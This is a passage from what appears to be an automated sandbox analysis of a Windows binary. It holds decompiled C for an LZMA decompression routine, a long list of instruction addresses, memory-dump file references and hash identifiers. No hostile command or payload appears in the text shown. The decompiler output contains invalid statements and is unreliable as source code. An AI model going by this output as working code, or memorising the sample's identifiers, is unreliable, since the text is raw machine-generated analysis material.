								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                0x00000000
                                                0x00406520
                                                0x00406520
                                                0x00406524
                                                0x004065db
                                                0x004065de
                                                0x004065ea
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x004068b6
                                                0x004068b6
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x00406891
                                                0x00406891
                                                0x00406895
                                                0x00406a44
                                                0x00000000
                                                0x00406a44
                                                0x004068a1
                                                0x004068a8
                                                0x004068b0
                                                0x004068b3
                                                0x00000000
                                                0x004068b3
                                                0x0040652a
                                                0x0040652e
                                                0x00406a6f
                                                0x00406a6f
                                                0x00406a72
                                                0x00406a76
                                                0x00406a76
                                                0x00406534
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00406a5a
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6b
                                                0x00000000
                                                0x00406a6b
                                                0x0040654e
                                                0x00406551
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00406582
                                                0x00406582
                                                0x00406582
                                                0x00406058
                                                0x00406058
                                                0x00406061
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00000000
                                                0x00406072
                                                0x00000000
                                                0x00000000
                                                0x0040607b
                                                0x0040607e
                                                0x00406081
                                                0x00406085
                                                0x00000000
                                                0x00000000
                                                0x0040608b
                                                0x0040608e
                                                0x00406090
                                                0x00406091
                                                0x00406094
                                                0x00406096
                                                0x00406097
                                                0x00406099
                                                0x0040609c
                                                0x004060a1
                                                0x004060a6
                                                0x004060af
                                                0x004060c2
                                                0x004060c5
                                                0x004060d1
                                                0x004060f9
                                                0x004060fb
                                                0x00406109
                                                0x00406109
                                                0x0040610d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004060fd
                                                0x004060fd
                                                0x00406100
                                                0x00406101
                                                0x00406101
                                                0x00000000
                                                0x004060fd
                                                0x004060d7
                                                0x004060dc
                                                0x004060dc
                                                0x004060e5
                                                0x004060ed
                                                0x004060f0
                                                0x00000000
                                                0x004060f6
                                                0x004060f6
                                                0x00000000
                                                0x004060f6
                                                0x00000000
                                                0x00406113
                                                0x00406113
                                                0x00406117
                                                0x004069c3
                                                0x00000000
                                                0x004069c3
                                                0x00406120
                                                0x00406130
                                                0x00406133
                                                0x00406136
                                                0x00406136
                                                0x00406136
                                                0x00406139
                                                0x0040613d
                                                0x00000000
                                                0x00000000
                                                0x0040613f
                                                0x00406145
                                                0x0040616f
                                                0x00406175
                                                0x0040617c
                                                0x00000000
                                                0x0040617c
                                                0x0040614b
                                                0x0040614e
                                                0x00406153
                                                0x00406153
                                                0x0040615e
                                                0x00406166
                                                0x00406169
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00000000
                                                0x00406261
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00406473
                                                0x00406477
                                                0x00406495
                                                0x00406498
                                                0x0040649f
                                                0x004064a2
                                                0x004064a5
                                                0x004064a8
                                                0x004064ab
                                                0x004064ae
                                                0x004064b0
                                                0x004064b7
                                                0x004064b8
                                                0x004064ba
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x004064c8
                                                0x00406479
                                                0x0040647c
                                                0x0040647f
                                                0x00406489
                                                0x00000000
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x004065ac
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00000000
                                                0x0040683d
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x00000000
                                                0x004069b0
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00000000
                                                0x00406805
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
